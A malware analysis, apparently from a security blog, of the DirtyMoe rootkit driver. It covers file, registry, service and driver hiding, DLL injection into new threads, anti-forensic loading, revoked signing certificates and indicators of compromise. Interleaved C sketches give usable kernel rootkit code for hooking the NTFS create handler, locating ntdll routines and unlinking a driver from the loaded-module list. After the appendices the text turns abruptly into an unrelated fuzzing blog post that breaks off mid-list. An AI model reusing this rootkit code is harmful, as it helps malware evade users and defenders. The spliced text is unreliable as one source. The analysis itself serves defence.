The FltPostOperation() method can modify a result of the QueryDirectory operations (IRP). In fact, the malware driver can affect (hide, insert, modify) a directory enumeration. So, some applications in the user-mode may not see the actual image of the requested directory.

The driver affects the QueryDirectory results only if the requesting process is not present in the whitelists. There are two whitelists. The first whitelists (Process ID and File names) ensure that the QueryDirectory results are not modified if the process ID or the process image file name of the process requesting the given I/O operation (QueryDirectory) is present in the whitelists. They represent malware processes that should have access to the file system without restriction. The other whitelist, WinDeviceNumber, defines a set of suffixes. The FltPostOperation() iterates over each item of the QueryDirectory result. If the enumerated item name has a suffix defined in the whitelist, the driver removes the item from the QueryDirectory results. This ensures that the whitelisted files are not visible to non-malware processes [2]. So, the driver can easily hide an arbitrary directory/file from user-mode applications, including explorer.exe. The name of the WinDeviceNumber whitelist is probably derived from the malware file names, e.g., Ke145057.xsl, since the suffix is a number; see Appendix B.

2.5 Callback of NTFS Driver

When the driver is loaded, the Driver Entry routine modifies the system driver for the NTFS filesystem. The original callback method for the IRP_MJ_CREATE major function is replaced by a malicious callback, MalNtfsCreatCallback(), as Figure 1 illustrates. The malicious callback determines who should gain access and who should not.

Figure 1. Rewrite IRP_MJ_CREATE callback of the regular NTFS driver
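One common way to perform such a swap is via the undocumented but well-known ObReferenceObjectByName export; whether DirtyMoe resolves the NTFS driver object exactly this way is not stated in the article, so treat this as a sketch of the technique:

#include <ntddk.h>

// Undocumented exports used to look up the NTFS driver object by name.
extern POBJECT_TYPE *IoDriverObjectType;
NTSTATUS ObReferenceObjectByName(
    _In_ PUNICODE_STRING ObjectName,
    _In_ ULONG Attributes,
    _In_opt_ PACCESS_STATE AccessState,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_TYPE ObjectType,
    _In_ KPROCESSOR_MODE AccessMode,
    _Inout_opt_ PVOID ParseContext,
    _Out_ PVOID *Object);

static PDRIVER_DISPATCH g_OriginalNtfsCreate;

// Simplified stand-in for MalNtfsCreatCallback(): the real callback applies the
// white/black-list checks before deciding whether to forward the request.
NTSTATUS MalNtfsCreatCallback(_In_ PDEVICE_OBJECT DeviceObject, _Inout_ PIRP Irp)
{
    return g_OriginalNtfsCreate(DeviceObject, Irp);
}

NTSTATUS HookNtfsCreate(VOID)
{
    UNICODE_STRING ntfsName = RTL_CONSTANT_STRING(L"\\FileSystem\\Ntfs");
    PDRIVER_OBJECT ntfsDriver = NULL;

    NTSTATUS status = ObReferenceObjectByName(&ntfsName, OBJ_CASE_INSENSITIVE, NULL, 0,
                                              *IoDriverObjectType, KernelMode, NULL,
                                              (PVOID *)&ntfsDriver);
    if (!NT_SUCCESS(status))
        return status;

    // Swap the IRP_MJ_CREATE handler, keeping the original for later forwarding.
    g_OriginalNtfsCreate = ntfsDriver->MajorFunction[IRP_MJ_CREATE];
    InterlockedExchangePointer((volatile PVOID *)&ntfsDriver->MajorFunction[IRP_MJ_CREATE],
                               (PVOID)MalNtfsCreatCallback);

    ObDereferenceObject(ntfsDriver);
    return STATUS_SUCCESS;
}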

The malicious callback is active only if the Minifilter Driver registration has been done and the original callback has been replaced. There are whitelists and one blacklist. The whitelists store information about allowed process image names, process IDs, and allowed files. If the process requesting disk access is whitelisted, then the requested file must also be on the whitelist; it is a double protection. The blacklist is focused on process image names; the blacklisted processes are denied access to the file system. Figure 2 demonstrates the whitelisting of processes. If a process is on the whitelist, the driver calls the original callback; otherwise, the request ends with access denied.

Figure 2. Grant access to whitelisted processes

In general, if the malicious callback determines that the requesting process is authorized to access the file system, the driver calls the original IRP_MJ_CREATE major function. If not, the driver finishes the request as STATUS_ACCESS_DENIED.

2.6 Registry Hiding

The driver can hide a given registry key. Each manipulation with a registry key is hooked by the kernel method GetCellRoutine(). The configuration manager assigns a control block for each open registry key. The control block (CM_KEY_CONTROL_BLOCK) structure keeps all control blocks in a hash table to quickly search for existing control blocks. The GetCellRoutine() hook method computes a memory address of a requested key. Therefore, if the malware driver takes control over the GetCellRoutine(), the driver can filter which registry keys will be visible; more precisely, which keys will be searched in the hash table.

The malware driver finds the address of the original GetCellRoutine() and replaces it with its own malicious hook method, MalGetCellRoutine(). The driver uses a well-documented implementation [3, 4]. It just goes through kernel structures obtained via the ZwOpenKey() kernel call. Then, the driver looks for the CM_KEY_CONTROL_BLOCK and its associated HHIVE structure corresponding to the requested key. The HHIVE structure contains a pointer to the GetCellRoutine() method, which the driver replaces; see Figure 3.

Figure 3. Overwriting GetCellRoutine

The pitfall of this method is that the offsets of the looked-up structures, variables, and methods are specific to each Windows version or build. So, the driver must determine which Windows version it is running on.

The MalGetCellRoutine() hook method performs 3 basic operations as follows:

  1. The driver calls the original kernel GetCellRoutine() method.
  2. Checks whitelists for a requested registry key.
  3. Catches or releases the requested registry key according to the whitelist check.
Registry Key Hiding

The hiding technique uses a simple principle. The driver iterates across the whole HIVE of a requested key. If the driver finds a registry key to hide, it returns the last registry key of the iterated HIVE. When the iteration reaches the end of the HIVE, the driver does not return the last key, since it was returned before, but just returns NULL, which ends the HIVE searching.

The consequence of this principle is that if the driver wants to hide more than one key, it returns the last key of the searched HIVE multiple times. So, the final results of the registry query can contain duplicate keys.

Whitelisting

The services.exe and System services are whitelisted by default, and there is no restriction. Whitelisted process image names are also without any registry access restriction.

A decision-making mechanism is more complicated for Windows 10. The driver hides the requested key only for the regedit.exe application if the Windows 10 build is 14393 (July 2016) or 15063 (March 2017).

2.7 Thread Notification

The main purpose of the Thread Notification is to inject malicious code into newly created threads. The driver registers a thread notification routine via PsSetCreateThreadNotifyRoutine() during the Driver Entry initialization. The routine registers a callback which is subsequently notified when a new thread is created or deleted. The suspicious callback (PCREATE_THREAD_NOTIFY_ROUTINE) NotifyRoutine() takes three arguments: ProcessID, ThreadID, and a Create flag. The driver affects only threads whose Create flag is set to TRUE, i.e., only newly created threads.
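The registration itself uses the documented API; a minimal sketch (the real callback continues with the injection logic described below):

#include <ntddk.h>

// Called by the kernel on every thread creation/termination.
static VOID ThreadNotifyRoutine(
    _In_ HANDLE ProcessId,
    _In_ HANDLE ThreadId,
    _In_ BOOLEAN Create)
{
    UNREFERENCED_PARAMETER(ThreadId);

    if (!Create) {
        return; // only newly created threads are of interest
    }

    DbgPrint("New thread in process %p\n", ProcessId);
}

NTSTATUS RegisterThreadNotification(VOID)
{
    return PsSetCreateThreadNotifyRoutine(ThreadNotifyRoutine);
}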

The whitelisting is focused on two aspects. The first one is an image name, and the second one is command-line arguments of a created thread. The image name is stored in WinDriverMaker1, and arguments are stored as a checksum in the WinDriverMaker2 variable. The driver is designed to inject only two processes defined by a process name and two processes defined by command line arguments. There are no whitelists, just 4 global variables.

2.7.1 Kernel Method Lookup

The successful injection of the malicious code requires several kernel methods. The driver does not call these methods directly due to detection techniques; instead, it tries to obfuscate the lookup of the required methods. The driver requires the following kernel methods: ZwReadVirtualMemory, ZwWriteVirtualMemory, ZwQueryVirtualMemory, ZwProtectVirtualMemory, NtTestAlert, LdrLoadDll.

The kernel methods are needed for successful thread injection because the driver needs to read/write process data of an injected thread, including program instructions.

Virtual Memory Method Lookup

The driver gets the address of the ZwAllocateVirtualMemory() method. As Figure 4 illustrates, all looked-up methods are located consecutively after the ZwAllocateVirtualMemory() method in ntdll.dll.

Figure 4. Code segment of ntdll.dll with VirtualMemory methods

The driver starts to inspect the code segment from the address of ZwAllocateVirtualMemory() and looks for instructions moving a constant into eax (e.g. mov eax, ??h). These constants identify the VirtualMemory methods; see Table 7.

Constant Method
0x18 ZwAllocateVirtualMemory
0x23 ZwQueryVirtualMemory
0x3A NtWriteVirtualMemory
0x50 ZwProtectVirtualMemory
Table 7. Constants of Virtual Memory methods for Windows 10 (64 bit)

When an appropriate constant is found, the final address of a looked-up method is calculated as follows:

method_address = constant_address - alignment_constant;
where alignment_constant helps to point to the start of the looked-up method.

The steps to find the methods can be summarized as follows:

  1. Get the address of ZwAllocateVirtualMemory(), which is not suspicious in terms of detection.
  2. Each sought method contains a specific constant on a specific address (constant_address).
  3. If the constant_address is found, another specific offset (alignment_constant) is subtracted;
    the alignment_constant is specific for each Windows version.

The exact implementation of the Virtual Memory Method Lookup is shown in Figure 5.

Figure 5. Implementation of the lookup routine searching for the kernel VirtualMemory methods
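A rough equivalent of the scan, as a sketch with a bounded search range (the constant and alignment values are the version-specific ones discussed above):

#include <ntddk.h>

// Scan forward from the address of ZwAllocateVirtualMemory (in the target
// process' ntdll) for a "mov eax, imm32" (opcode 0xB8) carrying the wanted
// constant, then back up by the version-specific alignment constant to the
// start of the routine.
PVOID FindRoutineByConstant(
    _In_ PUCHAR ZwAllocateVirtualMemoryAddress,
    _In_ ULONG Constant,
    _In_ ULONG AlignmentConstant,
    _In_ SIZE_T ScanLimit)
{
    for (SIZE_T i = 0; i + sizeof(ULONG) < ScanLimit; i++) {
        PUCHAR p = ZwAllocateVirtualMemoryAddress + i;

        if (p[0] == 0xB8 && *(ULONG UNALIGNED *)(p + 1) == Constant) {
            return p - AlignmentConstant; // start of the looked-up routine
        }
    }
    return NULL;
}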

The success of this obfuscation depends on the Windows version identification. We found one Windows 7 version for which the lookup returns different methods than the malware wants; namely, ZwCompressKey(), ZwCommitEnlistment(), ZwCreateNamedPipeFile(), ZwAlpcDeleteSectionView().
The alignment_constant is derived from the current Windows version during the driver initialization; see the Driver Entry routine.

NtTestAlert and LdrLoadDll Lookup

A different approach is used for getting NtTestAlert() and LdrLoadDll() routines. The driver attaches to the winlogon.exe process and gets the pointer to the kernel structure PEB_LDR_DATA containing PE header and imports of all processes in the system. If the import table includes a required method, then the driver extracts the base address, which is the entry point to the sought routine.

2.7.2 Process Injection

The aim of the process injection is to load a defined DLL library into a new thread via kernel function LdrLoadDll(). The process injection is slightly different for x86 and x64 OS versions.

The x64 OS version abuses the original NtTestAlert() routine, which checks the thread’s APC queue and is called periodically. An APC (Asynchronous Procedure Call) is a technique to queue a job to be done in the context of a specific thread. The driver rewrites the instructions of NtTestAlert() so that it jumps to the entry point of the malicious code.

Modification of NtTestAlert Code

The first step of the process injection is to find free memory for a code cave. The driver finds free memory near the NtTestAlert() routine address. The code cave includes a shellcode, as Figure 6 demonstrates.

Figure 6. Malicious payload overwriting the original NtTestAlert() routine

The shellcode prepares a parameter (the code cave address) for the malicious code and then jumps into it. The original NtTestAlert() address is moved into rax because the malicious code ends with a return instruction, so the original NtTestAlert() is then invoked. Finally, rdx contains the jump address where the driver injected the malicious code. The next item of the code cave is a path to the DLL file which shall be loaded into the injected process. The remaining items of the code cave are the original address and the original code instructions of NtTestAlert().

The driver writes the malicious code to the address defined in dll_loading_shellcode. The original instructions of NtTestAlert() are rewritten with an instruction which just jumps to the shellcode. As a result, when NtTestAlert() is called, the shellcode is activated and jumps into the malicious code.

Malicious Code x64

The malicious code for x64 is simple. Firstly, it recovers the original instructions of the rewritten NtTestAlert() code. Secondly, the code invokes the found LdrLoadDll() method and loads the appropriate DLL into the address space of the injected process. Finally, the code executes the return instruction and jumps back to the original NtTestAlert() function.

The x86 OS version abuses the entry point of the injected process directly. The procedure is very similar to the x64 injection, and the x86 malicious code is essentially identical to the x64 version. However, the x86 malicious code needs to find a 32-bit variant of the LdrLoadDll() method. It uses a technique similar to the one described above (NtTestAlert and LdrLoadDll Lookup).

2.8 Service Hiding

Windows uses the Service Control Manager (SCM) to manage the system services. The executable of the SCM is services.exe. This program runs at system startup and performs several functions, such as running, ending, and interacting with system services. The SCM process also keeps all running services in an undocumented service record (SERVICE_RECORD) structure.

The driver must patch the service record to hide a required service. Firstly, the driver must find the services.exe process and attach to it via KeStackAttachProcess(). The malware author defined a byte sequence which the driver looks for in the process memory to find the service record. services.exe keeps all running services as a linked list of SERVICE_RECORD [5]. The malware driver iterates this list and unlinks the required services defined by the listServices whitelist; see Table 4.

The byte sequence used for Windows 2000, XP, Vista, and Windows 7 is as follows: {45 3B E5 74 40 48 8D 0D}. There is another byte sequence {48 83 3D ?? ?? ?? ?? ?? 48 8D 0D} that is never used, because it is bound to a Windows version that the malware driver never identifies; perhaps it is still in development.

The hidden services cannot be detected using the PowerShell command Get-Service, Windows Task Manager, Process Explorer, etc. However, started services are logged via the Windows Event Log. Therefore, we can enumerate all regular services and all logged services and then diff the two lists to find the hidden services.

2.9 Driver Hiding

The driver is able to hide itself or another malicious driver based on an IOCTL from user mode. The Driver Entry receives a parameter representing the driver object (DRIVER_OBJECT) of the loaded driver image. The driver object contains an officially undocumented item called the driver section. The LDR_DATA_TABLE_ENTRY kernel structure stores information about the loaded driver, such as the base/entry point address, image name, image size, etc. The driver section points to an LDR_DATA_TABLE_ENTRY in a double-linked list representing all loaded drivers in the system.

When a user-mode application lists all loaded drivers, the kernel enumerates the double-linked list of the LDR_DATA_TABLE_ENTRY structure. The malware driver iterates the whole list and unlinks items (drivers) that should be hidden. Therefore, the kernel loses pointers to the hidden drivers and cannot enumerate all loaded drivers [6].
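A classic sketch of this unlinking, here hiding the driver’s own entry (the LDR_DATA_TABLE_ENTRY layout is unofficial, and only its first field matters for the unlink):

#include <ntddk.h>

// Partial, unofficial layout -- only InLoadOrderLinks is needed for unlinking.
typedef struct _LDR_DATA_TABLE_ENTRY_PARTIAL {
    LIST_ENTRY InLoadOrderLinks;
    // ... base address, entry point, image name, image size, etc.
} LDR_DATA_TABLE_ENTRY_PARTIAL, *PLDR_DATA_TABLE_ENTRY_PARTIAL;

// Hide the calling driver by unlinking its own entry from the loaded-module list.
VOID HideSelf(_In_ PDRIVER_OBJECT DriverObject)
{
    PLDR_DATA_TABLE_ENTRY_PARTIAL self =
        (PLDR_DATA_TABLE_ENTRY_PARTIAL)DriverObject->DriverSection;
    PLIST_ENTRY entry = &self->InLoadOrderLinks;

    // Classic DKOM unlink: neighbours skip over this entry, and the entry
    // points to itself so later list walks starting from it do not crash.
    entry->Blink->Flink = entry->Flink;
    entry->Flink->Blink = entry->Blink;
    entry->Flink = entry;
    entry->Blink = entry;
}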

2.10 Driver Unload

The Driver Unload function contains suspicious code, but it seems to never be used in this version. The rest of the unload functionality executes the standard procedure to unload the driver from the system.

3. Loading Driver During Boot

The DirtyMoe service loads the malicious driver. The driver image is not permanently stored on disk, since the service always extracts, loads, and deletes the driver image on service startup. The secondary aim of the service is to eliminate evidence of the driver loading and thereby complicate forensic analysis. The service aspires to camouflage its registry and disk activity. The DirtyMoe service is registered as follows:

Service name: Ms<volume_id>App; e.g., MsE3947328App
Registry key: HKLM\SYSTEM\CurrentControlSet\services\<service_name>
ImagePath: %SystemRoot%\system32\svchost.exe -k netsvcs
ServiceDll: C:\Windows\System32\<service_name>.dll, ServiceMain
ServiceType: SERVICE_WIN32_SHARE_PROCESS
ServiceStart: SERVICE_AUTO_START

3.1 Registry Operation

On startup, the service creates a registry record, describing the malicious driver to load; see following example:

Registry key: HKLM\SYSTEM\CurrentControlSet\services\dump_E3947328
ImagePath: \??\C:\Windows\System32\drivers\dump_LSI_FC.sys
DisplayName: dump_E3947328

At first glance, it is evident that ImagePath does not reflect DisplayName, contrary to the common Windows naming convention. Moreover, an ImagePath prefixed with the dump_ string is normally used for virtual drivers (loaded only in memory) that manage the memory dump during a Windows crash. The malware tries to use the virtual driver naming convention to be less conspicuous. The principle of memory dumping using the virtual drivers is described in [7, 8].

ImagePath values differ on each Windows reboot, but they always abuse the name of a native system driver; see a few instances collected during Windows boots: dump_ACPI.sys, dump_RASPPPOE.sys, dump_LSI_FC.sys, dump_USBPRINT.sys, dump_VOLMGR.sys, dump_INTELPPM.sys, dump_PARTMGR.sys

3.2 Driver Loading

When the registry entry is ready, the DirtyMoe service dumps the driver into the file defined by ImagePath. Then, the service loads the driver via ZwLoadDriver().
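From the service’s user-mode side, that load step boils down to the native NtLoadDriver call on the registry path created above — a sketch, assuming the caller holds SeLoadDriverPrivilege:

#include <windows.h>
#include <winternl.h>
#include <wchar.h>

// NtLoadDriver is exported by ntdll.dll but not declared in the SDK headers.
typedef NTSTATUS (NTAPI *PFN_NT_LOAD_DRIVER)(PUNICODE_STRING DriverServiceName);

NTSTATUS LoadDriverByRegistryKey(PCWSTR serviceKeyPath)
{
    UNICODE_STRING serviceName;
    serviceName.Buffer = (PWSTR)serviceKeyPath;
    serviceName.Length = (USHORT)(wcslen(serviceKeyPath) * sizeof(WCHAR));
    serviceName.MaximumLength = (USHORT)(serviceName.Length + sizeof(WCHAR));

    PFN_NT_LOAD_DRIVER pNtLoadDriver = (PFN_NT_LOAD_DRIVER)
        GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtLoadDriver");
    if (pNtLoadDriver == NULL)
        return (NTSTATUS)0xC0000001L; // STATUS_UNSUCCESSFUL

    // Succeeds only if the caller holds SeLoadDriverPrivilege.
    return pNtLoadDriver(&serviceName);
}

// Usage, with the registry key from the example above:
// LoadDriverByRegistryKey(L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\services\\dump_E3947328");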

3.3 Evidence Cleanup

When the driver is loaded either successfully or unsuccessfully, the DirtyMoe service starts to mask various malicious components to protect the whole malware hierarchy.

The DirtyMoe service removes the registry key representing the loaded driver; see Registry Operation. Further, the loaded driver hides the malware services, as the Service Hiding section describes. Registry entries related to the driver are removed via API calls. However, the API call just removes the relevant HIVE pointer, and the unreferenced data is still present in the HIVE stored on disk, located in %SystemRoot%\system32\config\SYSTEM. Hence, a forensic track remains, and we can read the removed registry entries via RegistryExplorer.

The loaded driver also removes the dumped (dump_ prefix) driver file. We were not able to restore this file via tools enabling recovery of deleted files, but it was extracted directly from the service DLL file.

Capturing the driver image and registry keys

The malware service is responsible for the driver loading and for cleaning up the loading evidence. We put a breakpoint on the nt!IopLoadDriver() kernel method, which is reached when a process wants to load a driver into the system. We waited for the wanted driver, and then we listed all the system processes. The corresponding service (svchost.exe) had a call stack containing the kernel call for driver loading; we then killed the service by modifying the EIP register. The killed process (service) caused Windows to end in a BSoD. Windows made a crash dump, so the file system caches were flushed, and the malicious service did not finish the cleanup in time. Therefore, we were able to mount the volume and read all the wanted data.

3.4 Forensic Traces

Although the DirtyMoe service takes great pains to cover up the malicious activities, there are a few aspects that help identify the malware.

The DirtyMoe service and loaded driver itself are hidden; however, the Windows Event Log system records information about started services. Therefore, we can get additional information such as ProcessID and ThreadID of all services, including the hidden services.

WinDbg connected to the Windows kernel can display all loaded modules using the lm command. The module list can uncover non-virtual drivers with prefix dump_ and identify the malicious drivers.

An offline-connected volume can provide the DLL library of the service and other supporting files, which are unfortunately encrypted and obfuscated with VMProtect. Finally, the offline SYSTEM registry stores records of the DirtyMoe service.

4. Certificates

Windows Vista and later versions of Windows require that loaded drivers be code-signed. The digital code signature should verify the identity and integrity of the driver vendor [9]. However, Windows does not check the current status of all certificates signing a Windows driver. So, if one of the certificates in the path is expired or revoked, the driver is still loaded into the system. We will not discuss why Windows loads drivers with invalid certificates, since this topic is really broad; backward compatibility, but also the potential impact on the kernel implementation, plays a role.

DirtyMoe drivers are signed with three certificates as follows:

Beijing Kate Zhanhong Technology Co.,Ltd.
Valid From: 28-Nov-2013 (2:00:00)
Valid To: 29-Nov-2014 (1:59:59)
SN: 3C5883BD1DBCD582AD41C8778E4F56D9
Thumbprint: 02A8DC8B4AEAD80E77B333D61E35B40FBBB010A0
Revocation Status: Revoked on 22-May-‎2014 (9:28:59)

Beijing Founder Apabi Technology Limited
Valid From: 22-May-2018 (2:00:00)
Valid To: 29-May-2019 (14:00:00)
SN: 06B7AA2C37C0876CCB0378D895D71041
Thumbprint: 8564928AA4FBC4BBECF65B402503B2BE3DC60D4D
Revocation Status: Revoked on 22-May-‎2018 (2:00:01)

Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Valid From: 23-Mar-2011 (2:00:00)
Valid To: 23-Mar-2012 (1:59:59)
SN: 5F78149EB4F75EB17404A8143AAEAED7
Thumbprint: 31E5380E1E0E1DD841F0C1741B38556B252E6231
Revocation Status: Revoked on 18-Apr-‎2011 (10:42:04)

The certificates have been revoked by their certification authorities and are registered as stolen, leaked, misused, etc. [10]. Although all the certificates were revoked in the past, Windows loads these drivers successfully because the root certificate authorities are marked as trusted.

5. Summarization and Discussion

We summarize the main functionality of the DirtyMoe driver. We discuss the quality of the driver implementation, anti-forensic mechanisms, and stolen certificates for successful driver loading.

5.1 Main Functionality

Authorization

The driver is controlled via IOCTL codes which are sent by malware processes in user mode. However, the driver implements an authorization instrument which verifies that the IOCTLs are sent by authenticated processes. Therefore, not all processes can communicate with the driver.

Affecting the Filesystem

If a rootkit is in the kernel, it can do “anything”. The DirtyMoe driver registers itself in the filter manager and begins to influence the results of filesystem I/O operations; in fact, it begins to filter the content of the filesystem. Furthermore, the driver replaces the NtfsCreatCallback() callback function of the NTFS driver, so the driver can determine who should and who should not gain access to the filesystem.

Thread Monitoring and Code injection

The DirtyMoe driver registers a malicious routine which is invoked when the system creates a new thread. The malicious routine abuses the APC kernel mechanism to execute the malicious code. It loads an arbitrary DLL into the new thread.

Registry Hiding

This technique abuses the kernel hook method that indexes registry keys in a HIVE. The code execution of the hook method is redirected to the malicious routine, so the driver can control the indexing of registry keys. In effect, the driver can select which keys will be indexed and which will not.

Service and Driver Hiding

Patching of specific kernel structures prevents certain API functions from enumerating all system services or loaded drivers. Windows services and drivers are stored as double-linked lists in the kernel. The driver corrupts these kernel structures so that malicious services and drivers are unlinked from them. Consequently, when the kernel iterates these structures for the purpose of enumeration, the malicious items are skipped.

5.2 Anti-Forensic Technique

As we mentioned above, the driver is able to hide itself. But before the driver loading, the DirtyMoe service must register the driver in the registry and dump the driver into a file. When the driver is loaded, the DirtyMoe service deletes all registry entries related to the driver loading. The driver then deletes its own file from the file system through kernel mode. Therefore, the driver is loaded in memory, but its file is gone.

The DirtyMoe service removes the registry entries via standard API calls. We can restore this data from the physical storage, since the API calls only remove the pointer from the HIVE. The dumped driver file is never physically stored on the disk drive because its size is small and it is present only in the cache memory. Accordingly, the file is removed from the cache before the cache is flushed to disk, so we cannot restore the file from the physical disk.

5.3 Discussion

The whole driver serves as an all-in-one super rootkit package. Any malware can register itself with the driver if it knows the authorization code. After successful registration, the malware can use a wide range of driver functionality. Since the authorization code is hardcoded and the driver’s name can be derived, we can hypothetically communicate with the driver and stop it.

The system loads the driver via the DirtyMoe service within a few seconds. Moreover, the driver file is never physically present in the file system, only in the cache. The driver is loaded via the API call, and the DirtyMoe service keeps a handle to the driver file, so manipulation with the driver file is limited. However, the driver removes its own file using a kernel call. Therefore, the driver file is removed from the file system cache, and the driver handle is still valid, with the difference that the driver file no longer exists, including its forensic traces.

The DirtyMoe malware is written in Delphi in most cases. Naturally, the driver is coded in native C. The code style of the driver and of the rest of the malware is very different. Our analysis showed that most of the driver functionalities were taken from public samples on internet forums. Each implementation part of the driver is also written in a different style. The malware authors have merged the individual rootkit functionalities into one kit. They have also merged the known bugs, so the driver shows a few significant symptoms of its presence in the system. The authors needed to adapt the functionality of the public samples to their purpose, but that has been done in a very dilettante way. It seems that the malware authors are familiar only with Delphi.

Finally, the code-signing certificates that are used were revoked in the middle of their validity period. However, the certificates are still widely used for code signing, so the private keys of the certificates have probably been stolen or leaked. In addition, the stolen certificates were signed by certification authorities which Microsoft trusts, so drivers signed in this way can still be loaded into the system despite the revocation. Moreover, the trend of misusing such certificates is growing, and predictions show that it will continue to grow in the future. We will analyze the problems of code-signing certificates in a future post.

6. Conclusion

The DirtyMoe driver is an advanced rootkit that DirtyMoe uses to effectively hide malicious activity on host systems. This research was undertaken to inspect the rootkit functionality of the DirtyMoe driver and evaluate its impact on infected systems. The study set out to investigate and present an analysis of the driver, namely its functionality, its ability to conceal itself, its deployment, and its code signature.

The research has shown that the driver provides key functionality for hiding malicious processes, services, and registry keys. Another dangerous capability of the driver is the injection of malicious code into newly created processes. Moreover, the driver implements a minifilter that monitors and affects I/O operations on the file system, so the file-system contents are filtered and selected files and directories can be hidden from users. An implication of this finding is that the malware itself and its artifacts are hidden even from AV software. More importantly, the driver implements another anti-forensic technique that removes the driver's evidence from disk and registry immediately after the driver is loaded. Still, a few traces can be found on victims' machines.

This study has provided the first comprehensive review of the driver that protects and serves every DirtyMoe service and process. The scope of this study was limited to the driver's functionality; further investigation is needed to hunt down and analyze other samples signed with the revoked certificates, since these abused certificates could help trace and identify the malware author.

IoCs

Samples (SHA-256)
550F8D092AFCD1D08AC63D9BEE9E7400E5C174B9C64D551A2AD19AD19C0126B1
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
B3B5FFF57040C801A4392DA2AF83F4BF6200C575AA4A64AB9A135B58AA516080
CB95EF8809A89056968B669E038BA84F708DF26ADD18CE4F5F31A5C9338188F9
EB29EDD6211836E6D1877A1658E648BEB749091CE7D459DBD82DC57C84BC52B1


Appendix A

Registry entries used in the Start Routine

\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceAddress
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNumber
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceId
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceName
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameOnly
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB_2


Appendix B

Example of registry entries configuring the driver

Key: ControlSet001\Control\WinApi
Value: WinDeviceAddress
Data: Ms312B9050App;   

Value: WinDeviceNumber
Data:
\WINDOWS\AppPatch\Ke601169.xsl;
\WINDOWS\AppPatch\Ke237043.xsl;
\WINDOWS\AppPatch\Ke311799.xsl;
\WINDOWS\AppPatch\Ke119163.xsl;
\WINDOWS\AppPatch\Ke531580.xsl;
\WINDOWS\AppPatch\Ke856583.xsl;
\WINDOWS\AppPatch\Ke999860.xsl;
\WINDOWS\AppPatch\Ke410472.xsl;
\WINDOWS\AppPatch\Ke673389.xsl;
\WINDOWS\AppPatch\Ke687417.xsl;
\WINDOWS\AppPatch\Ke689468.xsl;
\WINDOWS\AppPatch\Ac312B9050.sdb;
\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceName
Data:
C:\WINDOWS\AppPatch\Ac312B9050.sdb;
C:\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceId
Data: dump_FDC.sys;


Building a new snapshot fuzzer & fuzzing IDA

Introduction

It is January 2020 and it is that time of the year when I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It is always an exciting time for me to think and plan for the year ahead; who knows, maybe it'll be the year where I get good at computers, I thought (spoiler alert: it wasn't).

One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like the Windows Hypervisor Platform APIs and the KVM APIs, but also to try out what recent versions of C++ had in store. After I talked it over with yrp604, he convinced me to write a tool that could be used to fuzz any Windows target: user or kernel, application, service, or driver. He had done some work in this area so he could follow me along and help me out when I ran into problems.

Great, the plan was to develop a Windows snapshot-based fuzzer that runs the target code in some kind of environment like a VM or an emulator. It would allow users to instrument the target the way they want via breakpoints and would provide the basic features you expect from a modern fuzzer: code coverage, crash detection, a general mutator, cross-platform support, fast restore, etc.

Writing a tool is cool but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons:

  1. It is a complex Windows user-mode application,
  2. It parses a bunch of binary files,
  3. The application is heavy and slow to start; the snapshot approach could help fuzz it faster than a traditional approach would,
  4. It has a bug bounty.

In this blog post, I will walk you through the birth of what the fuzz (wtf), its history, and my overall journey from zero to accomplishing my initial goals. For those that want the results before reading, you can find my findings in this Github repository: fuzzing-ida75.

There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers.

Architecture

At this point I had a pretty good idea of what the final product should look like and how a user would use wtf:

  1. The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel-crash dump and extracts the CPU state.
